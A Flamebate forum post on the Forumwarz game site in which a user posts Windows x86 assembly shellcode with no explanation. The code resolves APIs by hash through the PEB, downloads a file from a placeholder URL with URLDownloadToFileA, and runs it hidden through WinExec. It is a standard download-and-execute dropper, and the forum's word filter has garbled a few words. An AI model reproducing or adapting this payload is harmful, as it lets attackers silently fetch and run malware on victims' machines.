Forumwarz is the first "Massively Single-Player" online RPG completely built around Internet culture.
You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.
You need to be logged in to post and to see the uncensored versions of these forums.
Viewing a Post
|
This **** works on Windows: .386 .model flat,stdcall ROL_CONSTANT equ 5 mrol macro iNum:req,iBits:req exitm <(iNum shl iBits) or (iNum shr (32-iBits))> endm mror macro iNum:req,iBits:req exitm <(iNum shr iBits) or (iNum shl (32-iBits))> endm hashapi macro szApi local dwApi dwApi = 0 forc x,szApi dwApi = dwApi + '&x' dwApi = mrol(dwApi,ROL_CONSTANT) endm dwApi = mrol(dwApi,ROL_CONSTANT) dw (dwApi and 0ffffh) endm .code bumume fs:nothing code_start: jmp load_data IFDEF TEST_CODE extern URLDownloadToFileA :proc call URLDownloadToFileA ; included when bumembled with /DTEST_CODE ENDIF setup_parameters: pop edi ; offset @cmd_start xor eax,eax ; eax = 0 cdq ; edx = 0 ; ******************************************************************** push eax ; exit code = 0 ; ******************************************************************** push eax ; SW_HIDE mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes push edi ; file name to execute ; ******************************************************************** push eax ; callback routine URLDownLoadToFileA push eax ; reserved, must be zero push edi ; file name to save as add edi,edx ; get offset of @url_start-1 stosb ; zero tail end mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url push edi ; url to download file from push eax ; interface add edi,edx ; get offset of @urlmon-1 stosb ; zero tail end of url ; ********************************************************************* load_modules: push edi ; save current offset to hashes push 30h pop ecx mov eax,fs:[ecx] ; PEB base address mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList scan_dll: mov ebx,[ebp+8] ; DllBase mov ebp,[ebp] ; Flink push ebp ; save mov eax,[ebx+3ch] mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames lodsd xchg eax,ecx ; ecx = NumberOfNames lodsd add eax,ebx ; AddressOfFunctions push eax lodsd lea edi,[eax+ebx] ; AddressOfNames lodsd lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals load_api: mov esi,[edi+4*ecx-4] add esi,ebx xor eax,eax cdq hash_api: lodsb add edx,eax rol edx,ROL_CONSTANT dec eax jns hash_api mov esi,[esp+8] ; get api hashes cmp dx,word ptr[esi] ; found a match? je call_api loop load_api pop eax ; check pop ebp ; jmp scan_dll call_api: pop eax movzx edx,word ptr [ebp+2*ecx-2] add ebx,[eax+4*edx] pop ebp ; modules pop edi ; api hashes call ebx ; call api stosw ; advance 2 bytes to next hash jmp load_modules ; do another, just keep going until ExitProcess is reached. ; ************************* load_data: call setup_parameters @cmd_start: db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE); @cmd_end: @url_start: db 'http://127.0.0.1/file.exe',0ffh ; url of file to download @url_end: hashapi <URLDownloadToFileA> hashapi <WinExec> hashapi <ExitProcess> ; ********************************************************************* end code_start |
||||||
Posted On: 07/17/2009 12:18PM | View quantumenergy's Profile | # |